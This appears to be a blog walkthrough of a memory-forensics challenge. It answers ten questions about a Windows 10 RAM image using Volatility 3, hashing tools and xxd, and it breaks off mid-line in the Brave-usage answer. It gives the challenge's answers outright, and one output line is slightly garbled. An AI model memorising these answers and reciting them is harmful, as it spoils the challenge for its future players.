          &lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
&lt;h1 id=&#34;walkthrough&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#walkthrough&#34;&gt;#&lt;/a&gt; Walkthrough&lt;/h1&gt;
&lt;p&gt;Memory acquisition  involves copying the contents of volatile memory to non-volatile storage. This is arguably one of the most important and precarious steps in the memory forensics process&lt;br&gt;
The memory dump will contains many usefull information like the time of the memory acquisition, The KB version, The build number and version of the operating system&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;1- What time was the RAM image acquired according to the suspect system? (YYYY-MM-DD HH:MM:SS)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We can inspect these information using  &lt;code&gt;imageinfo&lt;/code&gt;  plugin in volatility&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;vol3 -f 20210430-Win10Home-20H2-64bit-memdump.mem windows.info &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Kernel Base     0xf8043cc00000&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;DTB     0x1aa000&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Symbols ........&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Is64Bit True&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;IsPAE   False&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;layer_name      0 WindowsIntel32e&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;memory_layer    1 FileLayer&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;KdVersionBlock  0xf8043d80f368&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Major/Minor     15.19041&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;MachineType     34404&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;KeNumberProcessors      4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;SystemTime      2021-04-30 17:52:19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NtSystemRoot    C:\Windows&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NtProductType   NtProductWinNt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NtMajorVersion  10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NtMinorVersion  0&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;PE MajorOperatingSystemVersion  10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;PE MinorOperatingSystemVersion  0&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;PE Machine      34404&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;PE TimeDateStamp        Tue Oct 11 07:04:26 1977&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer:  2021-04-30 17:52:19&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;2- What is the SHA256 hash value of the RAM image?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;sha256sum&lt;/span&gt; 20210430-Win10Home-20H2-64bit-memdump.mem&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9db01b1e7b19a3b2113bfb65e860fffd7a1630bdf2b18613d206ebf2aa0ea172 20210430-Win10Home-20H2-64bit-memdump.mem&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer:  9db01b1e7b19a3b2113bfb65e860fffd7a1630bdf2b18613d206ebf2aa0ea172&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;3- What is the process ID of “brave.exe”?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;vol3 -f 20210430-Win10Home-20H2-64bit-memdump.mem windows.pslist | grep -i brave&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime              ExitTime       &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4856    1872    brave.exe       0xbf0f6ca782c0  0       -       1               False    2021-04-30 17:48:45    2021-04-30 17:50:56&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: 4856&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;4- How many established network connections were there at the time of acquisition? (number)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;vol3 -f 20210430-Win10Home-20H2-64bit-memdump.mem windows.netscan  | grep -i &lt;span class=&#34;string&#34;&gt;&amp;quot;2021-04-30&amp;quot;&lt;/span&gt; | grep -i ESTABLISHED&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6a53ca20  TCPv4   10.0.2.15       49833   52.230.222.68   443     ESTABLISHED     2812    svchost.exe     2021-04-30 17:50:07&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6ad16050  TCPv4   10.0.2.15       49829   142.250.191.208 443     ESTABLISHED     5624    svchost.exe     2021-04-30 17:49:58&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6ad1fad0  TCPv4   10.0.2.15       49847   52.230.222.68   443     ESTABLISHED     2812    svchost.exe     2021-04-30 17:52:17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6c6352b0  TCPv4   10.0.2.15       49842   52.113.196.254  443     ESTABLISHED     5104    SearchApp.exe   2021-04-30 17:51:25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6c7104d0  TCPv4   10.0.2.15       49778   185.70.41.130   443     ESTABLISHED     1840    chrome.exe      2021-04-30 17:45:00&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6cd4fa20  TCPv4   10.0.2.15       49837   204.79.197.200  443     ESTABLISHED     5104    SearchApp.exe   2021-04-30 17:51:18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6d0c64a0  TCPv4   10.0.2.15       49843   204.79.197.222  443     ESTABLISHED     5104    SearchApp.exe   2021-04-30 17:51:26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6d51c4a0  TCPv4   10.0.2.15       49838   13.107.3.254    443     ESTABLISHED     5104    SearchApp.exe   2021-04-30 17:51:23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6d525a20  TCPv4   10.0.2.15       49845   23.101.202.202  443     ESTABLISHED     1156    MsMpEng.exe     2021-04-30 17:51:36&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xe80000193a20  TCPv4   10.0.2.15       49845   23.101.202.202  443     ESTABLISHED     1156    MsMpEng.exe     2021-04-30 17:51:36&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Oh wait man! Don’t count it manually, just use the magic of  &lt;code&gt;wc -l&lt;/code&gt;  !&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;vol3 -f 20210430-Win10Home-20H2-64bit-memdump.mem windows.netscan  | grep -i &lt;span class=&#34;string&#34;&gt;&amp;quot;2021-04-30&amp;quot;&lt;/span&gt; | grep -i ESTABLISHED | &lt;span class=&#34;built_in&#34;&gt;wc&lt;/span&gt; -l&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: 10&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;5- What FQDN does Chrome have an established network connection with?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt; vol3 -f 20210430-Win10Home-20H2-64bit-memdump.mem windows.netscan | grep -i chrome&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6a896ae0.0TCPv4   10.0.2.15DB scan49773fin185.70.41.35    443     FIN_WAIT2       1840    chrome.exe      2021-04-30 17:44:58&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6c7104d0  TCPv4   10.0.2.15       49778   185.70.41.130   443     ESTABLISHED     1840    chrome.exe      2021-04-30 17:45:00&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6c85bb20  TCPv4   10.0.2.15       49775   185.70.41.35    443     FIN_WAIT2       1840    chrome.exe      2021-04-30 17:44:58&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6ca71a20  TCPv4   10.0.2.15       49769   142.250.190.14  443     CLOSE_WAIT      1840    chrome.exe      2021-04-30 17:44:55&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6cbb9530  TCPv4   10.0.2.15       49772   185.70.41.35    443     FIN_WAIT2       1840    chrome.exe      2021-04-30 17:44:58&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6cfd17f0  TCPv4   10.0.2.15       49777   35.186.220.63   443     CLOSE_WAIT      1840    chrome.exe      2021-04-30 17:44:58&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6d51c010  TCPv4   10.0.2.15       49763   172.217.4.35    443     CLOSE_WAIT      1840    chrome.exe      2021-04-30 17:44:53&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6d5c8a70  TCPv4   10.0.2.15       49797   172.217.4.74    443     CLOSE_WAIT      1840    chrome.exe      2021-04-30 17:48:27&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6d5d1ac0  TCPv4   10.0.2.15       49770   185.70.41.35    443     FIN_WAIT2       1840    chrome.exe      2021-04-30 17:44:57&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0xbf0f6d8a1010  TCPv4   10.0.2.15       49771   185.70.41.35    443     CLOSE_WAIT      1840    chrome.exe      2021-04-30 17:44:57&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Wow man! we found a single established connection with IP  &lt;code&gt;185.70.41.130&lt;/code&gt; &lt;br&gt;
I used a random website that give me the FQDN from the IP address!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/XJSnlsS.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer:  &lt;code&gt;protonmail.ch&lt;/code&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;6- What is the MD5 hash value of process executable for PID 6988?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let’s dump the executable of the process with pid 6988, I used to do that with  &lt;code&gt;procdump&lt;/code&gt;  plugin with volatility2, but this time i am trying to use volatility3 so with somesearch i found that  &lt;code&gt;windows.pslist&lt;/code&gt;  plugin has  &lt;code&gt;--dump&lt;/code&gt;  argument that can dump the excutable of the process. Let’s do it !&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;vol3 -f 20210430-Win10Home-20H2-64bit-memdump.mem windows.pslist --pid 6988 --dump &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Volatility 3 Framework 2.2.0&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Progress:  100.00               PDB scanning finished&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime      ExitTime        File output&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6988    4352    OneDrive.exe    0xbf0f6d4262c0  26      -       1       True    2021-04-30 17:40:01     N/A     pid.6988.0x1c0000.dmp&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now it’s time to use  &lt;code&gt;md5sum&lt;/code&gt;  to get the md5 hash of the executable!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;md5sum&lt;/span&gt; pid.6988.0x1c0000.dmp&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0b493d8e26f03ccd2060e0be85f430af  pid.6988.0x1c0000.dmp&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: 0b493d8e26f03ccd2060e0be85f430af&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;7- What is the word starting at offset 0x45BE876 with a length of 6 bytes?&lt;br&gt;
OK we need to know the word at offset 0x45BE876! we can do it using  &lt;code&gt;xxd&lt;/code&gt;  just we start from this offest and stop after 6 bytes! to specify the offset that you want to start from it just use  &lt;code&gt;-s&lt;/code&gt;  options and to specify the length to display use  &lt;code&gt;-l&lt;/code&gt;  option&lt;/p&gt;
&lt;/blockquote&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;xxd -g1 --s 0x45be876 -l 6 20210430-Win10Home-20H2-64bit-memdump.mem &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;045be876: 68 61 63 6b 65 72                                hacker&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: hacker&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;8- What is the creation date and time of the parent process of “powershell.exe”? (YYYY-MM-DD HH:MM:SS)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We need to know the parent process of powershell! we can do it using  &lt;code&gt;pslist&lt;/code&gt;  and check the  &lt;code&gt;PPID&lt;/code&gt; . But I’ll go with  &lt;code&gt;pstree&lt;/code&gt;  plugin! it will make it easier for me. I don’t want to waste my time searching at the parent process using PPID !&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;vol3 -f 20210430-Win10Home-20H2-64bit-memdump.mem windows.pstree |  grep -i powershell -B 4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;* 564   668     LogonUI.exe     0xbf0f6b7b7100  0       -       1       False   2021-04-30 12:39:44      2021-04-30 17:39:58&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;* 4296  668     userinit.exe    0xbf0f6ca8f080  0       -       1       False   2021-04-30 17:39:48      2021-04-30 17:40:12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;** 4352 4296    explorer.exe    0xbf0f6ca662c0  82      -       1       False   2021-04-30 17:39:48      N/A&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;*** 6884        4352    VBoxTray.exe    0xbf0f6d186080  11      -       1       False   2021-04-30 17:40:01      N/A&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;*** 5096        4352    powershell.exe  0xbf0f6d97f2c0  12      -       1       False   2021-04-30 17:51:19      N/A&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: 2021-04-30 17:39:48&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;9- What is the full path and name of the last file opened in notepad?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Notepad is an executable that use the file as an argument ! so  &lt;code&gt;cmdline&lt;/code&gt;  plugin will help us the get the files opened with notepad !&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;vol3 -f 20210430-Win10Home-20H2-64bit-memdump.mem windows.cmdline | grep -i notepad   &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2520 notepad.exe     &lt;span class=&#34;string&#34;&gt;&amp;quot;C:\Windows\system32\NOTEPAD.EXE&amp;quot;&lt;/span&gt; C:\Users\JOHNDO~1\AppData\Local\Temp\7zO4FB31F24\accountNum&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer:  C:\Users\JOHNDO~1\AppData\Local\Temp\7zO4FB31F24\accountNum&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;10- How long did the suspect use Brave browser? (hh:mm:ss)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let me tell you something! When we speak about more details about system apps nothing will be usefull more than the windows registries! One of the most important registries is  &lt;code&gt;UserAssist&lt;/code&gt; &lt;br&gt;
The  &lt;code&gt;UserAssist&lt;/code&gt;  key, a part of Microsoft Windows registry, records the information related to programs run by a user on a Windows system&lt;/p&gt;
&lt;p&gt;Volatility is powerful! we can use the  &lt;code&gt;userassist&lt;/code&gt;  plugin to get what we want!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;vol3 -f 20210430-Win10Home-20H2-64bit-memdump.mem windows.registry.userassist | grep -i brave &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;* 0xa80333cda0000       \??\C:\Users\John Doe\ntuser.dat        ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\&amp;#123;CEBFF5CD-ACE2-4F4F-9178-9926F41749EA&amp;#125;\Count  2021-04-30 17:52:18      Value   %ProgramFiles%\BraveSoftware\Temp\GUM20E0.tmp\BraveUpdate.exe N/A      0       0       0:00:03  N/A&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;* 0xa80333cda000        \??\C:\Users\John Doe\ntuser.dat        ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\&amp;#123;CEBFF5CD-ACE2-4F4F-9178-9926F41749EA&amp;#125;\Count  2021-04-30 17:52:18      Value   %ProgramFiles%\BraveSoftware\Update\BraveUpdate.exe     N/A   0:00:24.797000   N/A&lt;/span&gt;&lt;br&gt;&lt;span 